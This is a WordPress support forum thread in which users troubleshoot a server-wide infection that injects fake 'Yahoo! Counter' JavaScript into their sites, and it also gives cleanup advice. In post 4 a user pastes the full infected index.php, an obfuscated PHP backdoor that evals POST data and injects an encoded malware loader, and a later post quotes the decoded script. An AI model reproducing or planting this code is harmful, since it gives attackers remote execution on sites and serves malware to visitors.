WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Virus attack! - please advise (17 posts)

  1. philgreen
    Member
    Posted 5 years ago #

    I started this thread cause I thought I just had rss problems but it turns out it was a virus.

    My website is at veryserious.org, if you go there now you will just see an index.html I put there. But, if you're not running IE, go to veryserious.org/index.php and then view the source. There is a bit of code that starts out "Yahoo! counter".

    This malicious little piece of js is all over my site and I has appended itself to every file that it can. It was on the wordpress dashboard pages even, until i reinstalled.

    I don't have shell access so I downloaded everything to my local machine and did a text search using agent ransack for any text matching "Yahoo! Counter". I mostly just found html files that had been infected.

    Strangely enough, the wordpress/index.php is uninfected:

    http://veryserious.org/wordpress/index.php

    My question is, which files go into making the index.php file?

    http://veryserious.org/index.php

    I need to know so I can clean them.

  2. moshu
    Member
    Posted 5 years ago #

    Almost all the theme files:
    header.php (and it calls the style.css)
    index.php
    sidebar.php
    footer.php

    Add the comments.php when on a single post view,
    page.php when seeing Pages

    and so on.

    On different views the index.php is replaced in the structure above by single.php, page.php, archive.php and any other Page template and/or Category template.

  3. philgreen
    Member
    Posted 5 years ago #

    I switched themes and the thing still appeared, so I figured it wasn't coming from my theme.

    How about this question:

    what files make http://veryserious.org/index.php that don't touch http://veryserious.org/wordpress/index.php? The fact that that page is clean seems really weird to me.

  4. philgreen
    Member
    Posted 5 years ago #

    If it's not my theme, it must be my index.php, right? The file looks like this, is this how it's supposed to look?

    <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJyElNzYlNjElNzIgJTYxJTJDJTY5fiUyQyU1Rn47fCU2OSE9fCIjNz82fC4/JTMxNjMuQCUyMiM7YUA9IyU1QiUyMjchJTM4IS4xfDVgN3wlMkVgJTMxPyUzNHwyLiQlMzUlMzhgIiElMkN+aSUyQiUyMkAlMzE0fDElMkUjM2A1PyUyMiUyQyElNjkjJTJCfiIxIzlgJTMxJTJFJTMxIzMkJTMyJCUyMiU1RHwlM0J+JTVGPTFgJTNCaWYkJTI4JTY0fiU2RiU2M3UlNkRlfCU2RWB0QC4jY28lNkZrI2llIy4hbWEjdCMlNjMlNjhgKCQlMkZAJTVDYmAlNjh8JTY3ZiN0IyUzREAlMzF8JTJGfiUyOT8lM0QlM0RuQHUlNkN8bHwlMjklNjYjJTZGP3IoISU2OXw9IzAlM0IhaSUzQ0AzJTNCaSQlMkIlMkIhKUBkb2N1JTZEZX4lNkV0JTJFfnd8JTcyaXRlQChgJTIyfiUzQ0BzfmNgJTcyJTY5ISU3MCQlNzQlM0UlNjkjJTY2KGBfJTI5ZGBvP2N1P21lfCU2RX50YC5gJTc3fnIhaXQkJTY1JTI4JTVDJTIyISUzQz9zJTYzckAlNjklNzBAJTc0IGAlNjl+ZCUzRCElNUYiJTJCJTY5IyUyQiUyMl8/ID8lNzMlNzJjISUzRCUyRiUyRiUyMn4lMkJhWyU2OX4lNUQkJTJCJTIyISUyRiQlNjMlNzAlMkYlM0UlM0N+JTVDJTVDIS9zYyQlNzIjJTY5JTcwdCUzRSU1QyElMjJ+JTI5JTNDJTVDJCUyRiQlNzMlNjNgJTcyaWBwQHQlM0UlMjIpPzsnKS5yZXBsYWNlKC9AfFwkfFwhfGB8I3xcP3x+fFx8L2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wordpress/wp-blog-header.php');
    ?>

  5. whooami
    Member
    Posted 5 years ago #

    no, its not, and if you look inside the index.php that comes inside the downloadable zip file, you would see this.

    <?php
    /* Short and sweet */
    define('WP_USE_THEMES', true);
    require('./wordpress/wp-blog-header.php');
    ?>

    thats all that should be in that file. whats the permissions of that file, btw?

  6. philgreen
    Member
    Posted 5 years ago #

    The permission had been set wrong, I've fixed it. The problem is one my hosts know about, it's running a script that's in the tmp folder which I don't even have access to.

  7. esoterics
    Member
    Posted 5 years ago #

    I am curious as to the fix your host had. I too am seeing this code placed on all of my wordpress php pages but it does not exist in any of the files themselves that I can find. Can you provide more information please?

  8. mortn
    Member
    Posted 5 years ago #

    This just happened to me!

    I have no idea what it is or what it does, but after decompressing some of the text i got this:
    <script language=javascript><!-- Yahoo! Counter starts here -->
    if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2F!.$%2E%2...some compressed text....\n/%2F&%3C/%64i%76%3E').replace(/\||\$|\!|@||~|\&|#/g,""));var yahoo_counter=1;
    <!-- counter end --></script>

    and

    #<script language=javascript><!-- Yahoo! Counter starts here.+?</script>
    #s

    I found this text in ALMOST every .php on my webarea (total of some thousand files). And I havent even touched wordpress-files in ages. This happened to me last night.

    Is it yahoo counter or what?

  9. barrydt
    Member
    Posted 5 years ago #

    I'm having the same issue - I'm seeing this code on my admin pages and on my regular blog pags. It's being injected into the footer of all the pages, and my footer.php file has permissions set to 644, which should be safe. I'm up to date on the WP version 2.6.5, and can't find anywhere else that it might be hiding. Any ideas? if it's in my database, it's not there under the words Yahoo or counter or javascript, because I did a search for all of those, and any instance of those words is legitimate. Help!

  10. whooami
    Member
    Posted 5 years ago #

    I'm having the same issue

    which issue? The 2 posts above are not the same.

    What is/are the name(s) of the file(s) affected? footer.php only?

    What is the name of the theme that you are using? Where did you get it?

    And what is the exact code that you see in the file(s)?

  11. whooami
    Member
    Posted 5 years ago #

    never mind -- I found your blog. I see the code --- hang on .. I'm looking at it.

  12. whooami
    Member
    Posted 5 years ago #

    youre hosted with ixwebhosting. its a server wide issue. there were posts earlier today here from at least 2 other people hosted there.

    additionally, read this:

    http://www.linkedin.com/answers/technology/web-development/TCH_WDD/363337-34607963?browseCategory=

    It's a nasty hack. The code is injected into compromised sites (IXWebhosting has been hit bad by this, including all 24 of my domains. They have been rooted by another process). When you visit, it's a javascript that loads an "eoj" malware (detected by Kaspersky as a rootkit, but it's not a true version of a rootkit). To see if you've had the malware installed, go to your system32 folder and look for a file called sysaudio.sys. There is a real file by that name, but it's actually located in system32\drivers. If you see the file in system32, you've been hacked. Delete the file, and look under the
    "HKLM\software\microsoft\windows nt\currentversion\drivers32" key,
    with value and valuedata containing "aux"="sysaudio.sys" or "aux2"="sysaudio.sys". Export (for safety), then delete these entries. That should fix things.

    Also, look closely at your websites; the injection attack is a nasty piece of work. Look for fake .htaccess files redirecting search engines to a Russian Mafia hosted malware factory. If you go direct, everything is normal. If you surf from search engines like Yahoo or Google, you get redirected to the bad guys.

    Take care, nice to meet you.

    Guy De Marco, IT Services Manager, Cabela's (www.cabelas.com)

  13. whooami
    Member
    Posted 5 years ago #

    From above:

    They have been rooted by another process

    Now go read this, paying close attention to what I said about privilege escalation and root.

    http://wordpress.org/support/topic/221356?replies=2

    --

    Get a copy of your database. Change hosts. Now.

  14. lsilva
    Member
    Posted 5 years ago #

    I've had this same attack twice in the last week. Hosted by bluehost.com. What is the way to prevent this? Is php safe mode going to help?

  15. Samuel B
    moderator
    Posted 5 years ago #

  16. philgreen
    Member
    Posted 5 years ago #

    I switched to dreamhost and haven't had any of the problems I had with IXwebshosting.

  17. csrollyson
    Member
    Posted 5 years ago #

    All, I just went through this and documented the tools and process I used to make it right. Hope this helps you!

    http://globalhumancapital.org/?p=819

    cheers- Chris

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.